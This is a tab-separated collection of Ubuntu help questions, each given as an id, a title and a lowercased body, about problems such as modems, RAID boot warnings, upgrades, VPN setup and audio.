457181	can not connect my tata photon+ in normal boot mode ( able to connect in recovery mode )	i tried installing wvdial and configure the wvdialconf with number , username and password and it gives this : / $ ` sudo wvdial -- > wvdial : internet dialer version 1.61 -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory my lsusb gives this bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 05ca:18c3 ricoh co. , ltd bus 001 device 003 : id 0489 : e036 foxconn / hon hai bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 004 : id 046d : c31d logitech , inc. media keyboard k200 bus 003 device 003 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800/e173 ( hspa modem ) bus 003 device 002 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i tried adding my device in the network connections > mobile broadband but its of no use and im still unable to connect my device . p.s . : - i am a beginner please help . thanks in advance ...
457182	ginn not recognizing elan touchscreen with new evdev drivers	i have a lot of trouble getting the ( indeed very nice ) tool ginn to work . out of the box it worked fine with my touchscreen . however , with the current version of the evdev drivers ( in the repos ) , there was a problem that the calibration via `` xinput '' did not work as described here . i followed the answer and compiled and installed the latest evdev drivers manually . i can now calibrate my touchscreen correctly . however , with this new driver , ginn refuses to work . it gets the gestures form the touchpad but not from the touchscreen . the only file i changed was `` /usr/lib/xorg/modules/input/evdev_drv.so '' . any ideas how to fix this ? i also would be happy with a good documentation about ginn , found absolutely nothing except the man pages ... btw i 'm on linuxmint 16 / saucy . edit : just found out that with the old driver , the gestures are captured from the touchscreen but not from touchpad ( as expected ) . so ginn seems to wrongly swap these two devices . is there any possiblility to tell ginn to run explicitly on one device ?
457183	prevent minidlna to read nfo files	is there a way to stop minidlna reading nfo files ? why ? because it do n't do a good job at reading nfo files . i 've tv shows with nfo files in xbmc-format . sometimes the filename is shown and sometimes the title from nfo is shown . actually i do n't see why minidlna ca n't parse some nfo files since it 's always the same format . anyway , i would like to disable reading nfo files . is there a way to solve this ? since my video files are ( unfortunately ) located on a ntfs drive it 's not possible to handle this with file permissions . oh and i already tried a lot of dlna servers , but my samsung tv do works only well with minidlna
457185	my password can log me in , but nothing else ( `` user is not in the sudoers file '' error when i try )	i recently got a new user account for ubuntu 12.04 on linux after becoming unable to log in to one of my earlier accounts . i can log in to this account easily enough , but when i try to use the password to install software through the ubuntu software center , it reads : your authentication attempt was unsuccessful . please try again . i tried installing the software through the terminal with this : sudo apt-get install but when i entered my password , i got this message : [ username ] is not in the sudoers file . this incident will be reported . i searched the forums for a solution , and i found this thread , which told me to open a root terminal . i do n't know how to do this , but i found out i could get a root terminal by entering this in a normal terminal : sudo -i upon doing this , i was asked to enter my sudo password , and i got the same message as before . what am i missing or doing wrong ?
457186	can not get flash video websites ( youtube , etc . ) to work	i know that other , multiple questions have been posted on this , but i 'm fairly certain i 've applied most , if not all , of the suggested solutions , and i 'm no closer to resolving this issue . i am running ubuntu 12.04 ( black opal , 32-bit system , firefox web browser ) , and i can not use any website that provides flash video ( e.g. , youtube ) . the page loads , but the typical black box with the `` play '' icon does not load ... that area is completely white/blank . this is true of all other flash sites . i made sure i have the ubuntu-restricted-extras package installed , and i even tried installing the flashplugin-installer ... in fact , according to synaptic package manager , i have that and flashplugin-downloader installed . interestingly , i also have adobe-flashplugin version 11.2.202.350 , which would seem to be correct ( i know that support for flash in linux ended with 11.2 ) and both adobe-flash-properties-gtk and -kde ( whatever those are ) . also , it appears that none of the previous firefox helper-extensions for flash in linux are available any longer . i have no idea where to go from here , and being able to see flash websites is occasionally a necessity for me . as an interesting related note : google chrome/chromium ( i ca n't remember which ) was installed as part of my ubuntu system install , and i seem to remember it working ... until i installed the flashplugin-installer to try and fix my problems with flash ... now , chrome does n't even load ! double-clicking on the icon produces no response . looking in the system monitor , i can see instances of google chrome are invoked when i double-click the icon , but there is no visible effect ( no browser window , etc . ) running google chrome from terminal shows : [ 0428/183027 : error : nacl_helper_linux.cc ( 236 ) ] nacl helper process running without a sandbox ! most likely you need to configure your suid sandbox correctly . at the same time , i got a popup window that told me system problem has been detected ( or something to that effect ) and asked if i wanted to report it , etc , etc . what did i do wrong , or what am i missing ? thanks in advance !
457187	broken unity after upgrading	this questions is closely related with previous questions asked here . but there are some differences . i was trying to upgrade from 12.04 to 14.04ls . while download the packages , the system hanged suddenly . after waiting for an hour , i had to forcefully close everything . after this , the following things happened . 1 > the last linux kernel is not working and has been spoiled . 2 > i used an older version of the kernel and managed to get internet connection . after this , i can not log in . indeed i am getting the login screen . it does not allow allow me to log in and when i try , i get a similar screen like this and then it log out . i believe that the unity is broken . i could manage to upgrade by using the command prompt . still the problem is not getting sorted out . in fact , i tried the suggestions of the questions asked above . using it , i can manage to get a graphical prompt for the guest session , not for my user id . please help .
457192	`` not downloading file in useable form '' error when trying to make a live usb stick on a mac	i have downloaded ubuntu onto my mac but when i click on the file i get message that the following disk images could n't be opened.. image ubuntu-14.04 reason no mountable file systems . what do i need to do . i am trying to produce a usb version to use on a dell laptop
457201	time keeps changing	i use lubuntu 14.04 lts and time keeps changing on me . at first it was set to internet sync , i chose my country , but apperantly the time there is wrong because it was 3 hours back . i also tried to set it to sync manually to close countries that use the same time zone , they are all 3 hours back from what they should be . [ gmt instead of gmt+3 ] i then changed it manually from the time and date settings and locked it , that works but only until the computer is restarted , and then it goes 3 hours back on it 's own > . > edit : yes i am dual booting with windows
457202	prevent some interfaces from editing resolv.conf	i am trying to connect a camera to the internet . to do this , i have two devices : lte0 and wlan0 . the camera ( sony nex 5 ) is controlled over wlan0 , and lte0 is the lte connection . my /etc/network/interfaces is set up as follows : # automatically start the devices on boot . auto lo auto eth0 auto wlan0 auto lte0 # set up localhost iface lo inet loopback # this is to set up the ethernet address . iface eth0 inet static netmask 255.255.255.0 address 192.168.2.15 # these settings are for wifi . allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp # this is the lte connection allow-hotplug lte0 iface lte0 inet dhcp i have created a script in /etc/dhcp/dhclient-enter-hooks.d which prevents wlan0 from registering itself as the default gateway , but i ca n't seem to stop it from adding the camera to resolv.conf . unfortunately dhcp is necessary to get the correct settings for the camera ( netmask/ip etc . ) any ideas would be greatly appreciated . [ edit ] including my dhclient-enter-hooks script : # ! /bin/sh # prevent dhclient-script from setting default route every time it gets # a new dhcpoffer for any interface . interface_default_route= '' lte0 '' debug_file= '' /tmp/dhclient-nodefroute.debug '' echo `` interface $ { interface } entered dhcp because of $ reason . '' > > $ debug_file case `` $ reason '' in bound|renew|rebind|reboot|timeout ) echo `` new dhcp connection because of $ reason . '' > > $ debug_file echo `` dhcp for interface $ { interface } '' > > $ debug_file if [ $ { interface } ! = $ interface_default_route ] ; then echo `` interface $ { interface } does n't match $ { interface_default_route } , not setting default route . '' > > $ debug_file unset new_routers else echo `` default route for $ { interface } '' > > $ debug_file fi ; ; esac
457203	gnome shell no longer loads up	i performed an update last friday and after rebooting gnome was no longer displaying as an option when logging into account ( gnome flashback was displaying but very limited functionality ) . i then performed a purge on gnome files as directed in ubuntu forums and have been attempting to reinstall gnome to no avail . i am getting the following when trying to install from ubuntu software centre : **package dependencies can not be resolved** this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : gnome : depends : gnome-core ( = 1:3.8+4ubuntu3 ) but 1:3.8+4ubuntu3 is to be installed . any help will be gratefully received ( do n't really fancy doing a complete re-install of ubuntu tbh . ) ( i have just tried installing gnome in a terminal and received the following output : ) the following packages have unmet dependencies . gnome-shell : depends : gir1.2-mutter-3.0 ( > = 3.11.91 ) but it is not going to be installed depends : libmutter0d ( > = 3.11 ) but it is not going to be installed depends : libmutter0d ( < 3.12 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
457204	how can i lock the screen using the new lockscreen from the command line ?	ubuntu 14.04 introduces a new lockscreen that looks similar to the login screen . i am still able to lock the screen using the command gnome-screensaver-command -- lock ( as i always did before ) , which under 14.04 does lock the screen , but : if you are running it from the desktop , it locks the screen using the new lockscreen . if you are running it from a virtual console or via ssh , it locks the screen using the old lockscreen . i 've also tried using xdg-screensaver lock , but it works in the same way as gnome-screensaver-command -- lock does ( only uses the new lockscreen when it 's ran from the desktop ) . running light-locker-command -- lock did n't work , as light-locker is not installed . i guess there must be some differences between running the same command from the desktop and running it via ssh/virtual console , but i was not able to find any difference in the environment variables . so , my question is : how can i lock the screen using the new unity lockscreen and not the old lockscreen from the command line ? this question is probably related as it asks for the new command that needs to be used , so here 's another question : why does running the same lock command give different results ? note that gnome-screensaver is not being used anymore in 14.04 , according to this bug report : that 's not really a gnome-screensaver bug , that component stopped being used in trusty .
457208	bash command chaining	i 'd like to run chained commands but some are sequential and others are in background . running this command : echo 1 & & echo 2 & echo 3 & & echo 4 i 'd like to get : 1 2 ( background ) 3 4 but i get : 3 4 1 2 a more realistic example : compile & & run server & ( background , used by tests below ) run test 1 & & run test 2 & & kill server how can i do it using bash ? thanks !
457209	upgrade from 13.10 to 14.04 stalled - how to salvage ?	system : lenovo thinkpad x121e ( intel ) , lvm based setup with separate root , var , and home filesystem . var getting somewhat tight due to the packages downloaded and kept for the upgrade . during the upgrade from 13.10 to 14.04 , the upgrade process failed to continue . from output and processes around , it seems to be hanging in update-grub . the last action observed was logged as `` installed dbus-x11 '' . it 's been stuck since hours - how to proceed ? /var/lib/dpkg is locked /var/cache/debconf/config.dat is locked ( hanging update-grub process ) hup the update-grub and hope for upgrade to continue , run update-grub later on manually hup the upgrade , and hope it is either reentrant or successful at reestablishing prior conditions . if all else fails , it 'll take longer ... due to filesystem sizes on the notebook , i 'd rather avoid the full install - reinstall packages - revert to backup procedure , even though the result would be clean and preferrable . it 's the obvious if-all-else-fails fallback , but i 'm also curious on how graceful the update process can be salvaged . any ideas ?
457210	which vim version can i use ?	i recently installed vim on ubuntu ( 14.04 ) with unity . as it turns out , vim does not support yanking text to the clipboard ( usind + or * ) . i read here that i have to install gvim in order to add this capability to vim . using apt-cache search i did not find a package named gvim but the two packages vim-gnome and vim-gtk . as i understand it , those are two different types of graphical interface . since i use ubuntu with unity , i am unsure which one is suitable for me . what exactly are the differences between those two packages and which one can i use ?
457211	upgraded to 14.04 , now okular dies	i upgraded my kubuntu system to 14.04 , and now when i start it , it opens up a window , then puts the following messages : $ okular ar.drone2_user-guide_uk.pdf xlib : extension `` randr '' missing on display `` :0 '' . xlib : extension `` randr '' missing on display `` :0 '' . xlib : extension `` randr '' missing on display `` :0 '' . ca n't get xrandr version okular : fatal io error : client killed and then the window closes . i ca n't find anything in any log file .
457215	startup shortcuts screen lost .	when i first upgraded to trusty tahr , there was a screen with the keyboard shortcuts . after that , i do n't see it again and do n't know how to find it . does anyone know where it went ? thanks ,
457216	firefox and google chrome browser pop-ups not always showing window title bar in ubuntu 14.04	firefox and google chrome browser pop-ups 80 % of the time not showing window title bar in ubuntu 14.04 . if you increase the window size the title bar appears . also the indicator in the launcher icon does not show the window as open until you click on the launcher icon . i have reproduce this on nvidia and intel graphics hardware using both open and close source drivers . i have not tried it on ati graphics yet i believe that it is compiz not sizing the windows correctly causing the problem . does anyone know a fix to this ? it gets really annoying with website with lots of pop-ups .
457217	acer timelinex 5830tg internal microphone not working	problem : in ubuntu 12.04 and 14.04 , if you try to use internal mic , it gets a lot of static and is almost impossible to hear on the other side because of extremely low sound ( voip calls ) . recorder might work .
457219	14.04 usb mp3 player not recognized as storage medium anymore	after updating from 13.10 to 14.04 my mp3 player is not mounted anymore . under 13.10 it behaved like a normal usb stick and i could copy files to it . since the upgrade the device does not show up as block device anymore . after a fresh reboot the stick gets mounted for a few seconds , and then disappears . i can see the player with $ lsusb bus 002 device 020 : id 054c:0689 sony corp. and $ udevadm monitor kernel [ 3031.177130 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6 ( usb ) kernel [ 3031.177631 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0 ( usb ) kernel [ 3031.177769 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34 ( scsi ) kernel [ 3031.177788 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34/scsi_host/host34 ( scsi_host ) udev [ 3031.190066 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6 ( usb ) udev [ 3031.194110 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0 ( usb ) udev [ 3031.195647 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34 ( scsi ) udev [ 3031.196342 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34/scsi_host/host34 ( scsi_host ) kernel [ 3031.199824 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34/scsi_host/host34 ( scsi_host ) kernel [ 3031.199946 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34 ( scsi ) udev [ 3031.200736 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34/scsi_host/host34 ( scsi_host ) udev [ 3031.200761 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host34 ( scsi ) kernel [ 3031.368640 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35 ( scsi ) kernel [ 3031.369862 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35/scsi_host/host35 ( scsi_host ) udev [ 3031.369877 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35 ( scsi ) udev [ 3031.369886 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35/scsi_host/host35 ( scsi_host ) kernel [ 3031.536654 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35/scsi_host/host35 ( scsi_host ) kernel [ 3031.536680 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35 ( scsi ) udev [ 3031.537269 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35/scsi_host/host35 ( scsi_host ) udev [ 3031.537293 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/host35 ( scsi ) and $ tail -f /var/log/syslog apr 28 20:32:51 ubuntu colord : device added : sysfs-sony-walkman apr 28 20:32:51 ubuntu colord : device added : sysfs- ( null ) apr 28 20:32:51 ubuntu kernel : [ 3219.231831 ] usb 2-1.6 : usbfs : process 3053 ( threadweaver : :t ) did not claim interface 0 before use apr 28 20:32:51 ubuntu kernel : [ 3219.302565 ] usb 2-1.6 : reset high-speed usb device number 24 using ehci-pci apr 28 20:32:51 ubuntu kernel : [ 3219.394921 ] usb-storage 2-1.6:1.0 : usb mass storage device detected apr 28 20:32:51 ubuntu kernel : [ 3219.394966 ] scsi37 : usb-storage 2-1.6:1.0 apr 28 20:32:51 ubuntu kernel : [ 3219.395038 ] usb 2-1.6 : usbfs : process 3053 ( threadweaver : :t ) did not claim interface 0 before use apr 28 20:32:51 ubuntu kernel : [ 3219.470571 ] usb 2-1.6 : reset high-speed usb device number 24 using ehci-pci apr 28 20:32:51 ubuntu kernel : [ 3219.563279 ] usb 2-1.6 : usbfs : process 3053 ( threadweaver : :t ) did not claim interface 0 before use apr 28 20:32:51 ubuntu kernel : [ 3219.634589 ] usb 2-1.6 : reset high-speed usb device number 24 using ehci-pci apr 28 20:32:51 ubuntu kernel : [ 3219.727049 ] usb-storage 2-1.6:1.0 : usb mass storage device detected apr 28 20:32:51 ubuntu kernel : [ 3219.727152 ] scsi38 : usb-storage 2-1.6:1.0 apr 28 20:32:51 ubuntu kernel : [ 3219.727532 ] usb 2-1.6 : usbfs : process 3038 ( threadweaver : :t ) did not claim interface 0 before use apr 28 20:32:52 ubuntu kernel : [ 3219.802645 ] usb 2-1.6 : reset high-speed usb device number 24 using ehci-pci apr 28 20:32:52 ubuntu kernel : [ 3219.895293 ] usb 2-1.6 : usbfs : process 3053 ( threadweaver : :t ) did not claim interface 0 before use but with lsblk the device does not show up at all . any hints how i can fix or debug this ?
457221	ubuntu touch blank screen problem on samsung galaxy tab 2 7.0 ( gt-p3100 )	i 'm having my galaxy tab 2 7.0 which has custom rom installed ( cynogenmod version 10.1.0-p3100 ) . i have gone through many installation guides . the official one is this i have also downloaded saucy-preinstalled-phablet-armhf.zip and edited-device-specific-part.zip . at the time of installation , i have n't got any error but after installation i 'm even not able to see the ubuntu boot screen , im just getting blank screen . i have seen some older articles which says to wait for some time for the stable support of the ubuntu touch for my device but i think this version of ubuntu has stable support for p3100 then still why i 'm getting same error .
457224	failed to access windows 8.1 ntfs partition from ubuntu 13.10 , even after disable fast startup	i am using ubuntu 13.04 32 bit and windows 8.1 . when i try to mount windows 8.1 ntfs partition it is showing this error messageas below . previously i was using windows 7 , but i have no problem to mount that partition . i tried to follow this answer and do as follows with windows 8.1 solution : windows 8 there is a new feature in windows 8 called fast startup . if this feature is enabled ( which it is by default ) , windows 8 does not actually completely shutdown when you choose shutdown . instead , it does a `` hybrid shutdown '' . this is something like hibernating ; it makes booting windows 8 back up faster . so , you need to disable this feature to be able to shut it down properly , and be able to mount the windows partitions . to do this , boot into your windows 8 and : note : disabling fast startup will most likely make your windows 8 take a longer time to boot . there are no `` exact '' numbers , but let 's say that if it took you 10 seconds to boot into windows 8 , it will now take you 50 seconds after disabling this feature . open control panel in the small icons view and click on power options . click on choose what the power buttons do . click on change settings that are currently unavailable . uncheck turn on fast startup ( recommended ) . click on save changes . now , shutdown windows 8 and boot back into ubuntu . you 'll be able to mount without getting errors . but i can not mount windows 8.1 partition even after i done this . can any one help me please . the error message is error mounting /dev/sda2 at /media/rashed/windows 8.1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/rashed/windows 8.1 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
457226	how to get list of files from audio cd bash terminal	i 've been using vlc with command line batch files for years to rip audio cds . i just tried writing a similar bash script in ubuntu 14.04 and was surprised -- i ca n't figure out how to get a list of file names on the cd to pass to vlc media player to convert . i need something like : files=/path/to/*.cda for f in $ files do echo `` processing $ f file ... '' # take action on each file . $ f store current file name call_my_vlc_function ( $ f ) done is there a 'trick ' to getting a list of files on an audio cd in ubuntu for use in a bash script or is this just not possible ? i 've already read a number of articles on how the gvfs system is different from a 'real ' file system , but i 'm just amazed that there is something windows can do so trivially which ca n't be done in bash . tia , -- -jc
457227	how are packages maintained in ubuntu	lets say i copy a .deb package to /tmp directory and install it ( dpkg -i ) . after a reboot should this package get loaded automatically ? since /tmp directly gets wiped off i am wondering how the package is maintained after a reboot .
457228	ubuntu 10 + vpnc : no response from target	i have ubuntu 10.04.4 version i installed the vpnc successfully as the following link - http : //floppsie.comp.glam.ac.uk/glamorgan/gaius/networks/13.html example of the installation wget http : //www.unix-ag.uni-kl.de/~massar/vpnc/vpnc-0.5.3.tar.gz tar zxf vpnc-0.5.3.tar.gz sudo apt-get install libgcrypt11-dev libgpg-error-dev cd vpnc-0.5.3 make sudo make install so after installation and create the vpnc configuration file - /etc/vpnc/my.conf and activate the vpnc as the following vpnc my enter password for site @ 41.21.190.36 : vpnc : no response from target i get this bad error : no response from target i tries to solve the problem by adding the following lines ( one by one ) ike dh group dh2 nat traversal mode cisco-udp local port 10000 enable single des but this not solved the problem please advice what could be the problem ? i already check the resolv.conf file and goggled on all forums but i couldnât find the resolution please help
457231	xubuntu strange behaviour panel-indicator and panel-notification applet	i am running xubuntu 14.04 32bit on a lenovo x200 and got some strange behavior from the panel-indicator and panel-notification applets . both show blueman and i got multiple keyboard layout setting . so i got 3 icons for the keyboard , one would be enough . also i lost my network icon so no way of using the wifi now . but if i log into the guest account , i do have the network icon so do n't know what 's wrong there , when i try to restart the network service it fail ! can it be some broken package ? it is a clean and fresh install . should i switch to the 64bit version ?
457235	can not install java-7-jre on lubuntu 14.04	i am encountering an error message 'check internet connection ' half-way through an installation of java-7-jre from either software centre or sudo apt-get install . my wifi connection then goes . please can you advise of any steps i need to take , or further information needed . thanks edit - i upgraded to lubuntu 14.04 lts from ubuntu 12.04 lts choosing the 'upgrade from ubuntu 12.04 lts ' option on the iso disk i downloaded from ubuntu , - java worked perfectly on ubuntu 12.04 lts
457237	mdadm warning ( system unbootable ) from update-initramfs , mkconf 's suggested fix seems inconsistent with mdadm 's description of problem	summary : update-initramfs says system unbootable , message points to mkconf which suggests rewrite to mdadm.conf that would appear to break the raid , system up ( for now ) but next reboot may kill it , unclear how to proceed , mdadm.conf looks good but what is the update-initramfs warning telling me ? and why does mkconf seem to suggest something bad ? i have a dedicated server at 1and1.com running ubuntu 12.04 , and `` update-initramfs -u '' reports a mdadm error message indicating the server will not reboot properly . i 've looked at the relevant configuration files , and have not been able to identify the problem . i have n't tried to reboot since seeing this message , because i do not want to `` just see what happens '' on a server i ca n't physically access ( and possibly make diagnosis even more difficult , if i lose access to a running system that i can probe for information . ) i feel that i should try to understand the error message and system configuration , until i have confidence that a reboot is likely to succeed . first , the error message ( from update-initramfs -u ) : w : mdadm : the array /dev/md3 with uuid dffcb503 : bc157198:3fb6082e : e5593158 w : mdadm : is currently active , but it is not listed in mdadm.conf . if w : mdadm : it is needed for boot , then your system is now unbootable ! w : mdadm : please inspect the output of /usr/share/mdadm/mkconf , compare w : mdadm : it to /etc/mdadm/mdadm.conf , and make the necessary changes . w : mdadm : the array /dev/md1 with uuid a46d442b:4e5b8a52:3fb6082e : e5593158 w : mdadm : is currently active , but it is not listed in mdadm.conf . if w : mdadm : it is needed for boot , then your system is now unbootable ! w : mdadm : please inspect the output of /usr/share/mdadm/mkconf , compare w : mdadm : it to /etc/mdadm/mdadm.conf , and make the necessary changes . i concentrate below on md1 since that 's where /boot is located ( so `` needed for boot '' === true ) , but the same error message is also generated for md3 . the md structure is from the isp 's default ubuntu image , this part of the system has not been touched . the only change to the drive/partition structure was expanding the size of logical drives ( lvextend and resize2fs ) , which ( although it might affect other things ) would not seem to affect `` / '' ( on md1 ) and its ability to boot . cat /etc/fstab /dev/md1 / ext3 defaults 1 1 /dev/sda2 none swap sw /dev/sdb2 none swap sw /dev/vg00/usr /usr ext4 errors=remount-ro 0 2 /dev/vg00/var /var ext4 errors=remount-ro 0 2 /dev/vg00/home /home ext4 errors=remount-ro 0 2 proc /proc proc nodev , noexec , nosuid 0 0 we can see the md system running properly , with md1 on sda1 and sdb1 : cat /proc/mdstat -- -- - personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid1 sdb1 [ 1 ] sda1 [ 0 ] 4194240 blocks [ 2/2 ] [ uu ] md3 : active raid1 sdb3 [ 0 ] sda3 [ 1 ] 1458846016 blocks [ 2/2 ] [ uu ] it seems that these md 's are defined in array lines mdadm.conf : cat /etc/mdadm/mdadm.conf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default , scan all partitions ( /proc/partitions ) for md superblocks . # alternatively , specify devices to scan , using wildcards if desired . device partitions # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays # this file was auto-generated on tue , 11 may 2010 20:53:30 +0200 # by mkconf $ id $ array /dev/md1 level=raid1 num-devices=2 devices=/dev/sda1 , /dev/sdb1 array /dev/md3 level=raid1 num-devices=2 devices=/dev/sda3 , /dev/sdb3 the most recent initrd in /boot is initrd.img-3.2.0-37-generic , and mdadm.conf cached there looks identical ( checked via `` gunzip -c /boot/initrd.img-3.2.0-37-generic | cpio -i -- quiet -- to-stdout etc/mdadm/mdadm.conf '' ) so the actual situation ( the running md 's and how they are defined for boot ) looks fine to me . going back to the `` update-initramfs -u '' error message , it suggests comparing mdadm.conf to the output of /usr/share/mdadm/mkconf . this is where we start to see something that looks really different : /usr/share/mdadm/mkconf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays if i 'm reading this correctly , the system 's proposed rewrite of mdadm.conf ( to fix that md1 and md3 are `` currently active , but ... not listed in mdadm.conf '' ) would drop the listing of md1 and md3 from mdadm.conf . so i ca n't square the error message and the proposed fix ( change mdadm.conf to go from unlisted to listed , but where the proposed fix goes from listed to unlisted ? ) my inability to ( 1 ) find any actual problem , and ( 2 ) reconcile the error message with the proposed fix , makes me distrust the output of /usr/share/mdadm/mkconf ( and the error message directing me there , from update-initramfs -u ) . but i do n't want to ignore the system calling for help , especially on a part of the system that is so critical . i trust that the os knows something that i do n't . and experimentation ( remote reboot ) is a last resort . when searching online for others having similar error messages , related issues seem to involve mkconf generating array lines that are different from what is presently in mdadm.conf ( and using mkconf 's output is generally recommended , as a fix to the array lines . ) but in this case , mkconf provides no array lines at all , so this line of research has not led to relevant assistance . comments in mdadm.conf say that it scans for md superblocks by defualt , so the fact that the generated file omits explicit reference to md1/md3 is perhaps okay ( ? ) if mdadm can draw that information from the superblocks . but if so , why does the error message say that the problem is that md1/md3 is unlisted , and what is wrong with the present configuration ( why is there an error message at all ) ? so that line of thought ( trying to understand how a generated file without array lies might help ) has not worked out either . this is perhaps barking up the wrong tree , but are device names like sda1 currently allowed in mdadm.conf on array lines ? i know that uuid is preferred , could the use of device names be the cause of the error message ? if so , what options might work out : ( 1 ) no change to mdadm.conf and relying on the system continuing to assemble md1 based on device names ; ( 2 ) use the output of mkconf , with no explicit md 's at all ( no device name , no uuid 's ) , relying on automatic discovery based on superblocks ; ( 3 ) find the uuid 's and write new array lines for mdadm.conf ( which would be neither existing values , nor the mkconf proposed replacement ) ? how should the cause of this error message be identified , what is it trying to tell me ? additional information that might be useful : mdadm -- misc -- detail /dev/md1 /dev/md1 : version : 0.90 creation time : sun feb 24 19:11:59 2013 raid level : raid1 array size : 4194240 ( 4.00 gib 4.29 gb ) used dev size : 4194240 ( 4.00 gib 4.29 gb ) raid devices : 2 total devices : 2 preferred minor : 1 persistence : superblock is persistent update time : sun apr 27 23:39:38 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : a46d442b:4e5b8a52:3fb6082e : e5593158 events : 0.122 number major minor raiddevice state 0 8 1 0 active sync /dev/sda1 1 8 17 1 active sync /dev/sdb1 mdadm -- misc -- detail /dev/md3 /dev/md3 : version : 0.90 creation time : sun feb 24 19:11:59 2013 raid level : raid1 array size : 1458846016 ( 1391.26 gib 1493.86 gb ) used dev size : 1458846016 ( 1391.26 gib 1493.86 gb ) raid devices : 2 total devices : 2 preferred minor : 3 persistence : superblock is persistent update time : sun apr 27 23:43:41 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : dffcb503 : bc157198:3fb6082e : e5593158 events : 0.1883 number major minor raiddevice state 0 8 19 0 active sync /dev/sdb3 1 8 3 1 active sync /dev/sda3
457239	problem running skype on trusty tahr ( 64 bits )	i have successfully installed skype using ubuntu software center . when i tried running from command line , i received the following error message : $ skype skype : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory if i tried doing it through optirun ( i.e . forcing nvidia 's graphic card ) it works flawlessly . i 'm sure this library is installed for both 32 and 64 bits . how can i get it working ? i 'm using a asus q550 laptop .
457242	download of `` pecl/xdebug '' succeeded , but it is not a valid package archive	i tried to install the xdebug in ubuntu 14.04 , but when i execute the following command : sudo pecl install xdebug it returns the error : download of `` pecl/xdebug '' succeeded , but it is not a valid package archive someone had the same problem or knows how to fix it ? thanks
457243	slight sound `` crackle/pop '' in 14.04	i have a slight sort of crackling noise coming through my headset when i play , well , anything . it does n't seem to happen if i just open a youtube video and let it play , not touching anything else . but if i maximize and minimize a couple times it starts up ( or if i am doing anything else on the comp e.g . chatting on steam ) . i am new to linux and i am using my steelseries siberia v2 usb headset which has it 's own usb sound card 7.1 simulator thing . more info here : http : //steelseries.com/us/products/audio/steelseries-siberia-v2-usb i tried editing pulse settings but i ca n't seem to get permission to do that . and i looked up how to just delete pulse and ended up deleting a bunch of stuff i should n't have and then had 0 sound and no system settings ... i reinstalled everything is back to where it was . is there a workaround for this ?
457247	ubuntu login redirects back to login	i insatalled ubuntu 13.10 on windows machine using vmware . following problems i am getting when i am trying to log in , it redirects back to login with superuser or guest login by using cntrl+alt+f2 , it logs in with command prompt but not accepting any of command e. g. if i use sudo something it gives me error like command 'sudo ' is availalable in /usr/bin/sudo please help as i am new to ubuntu
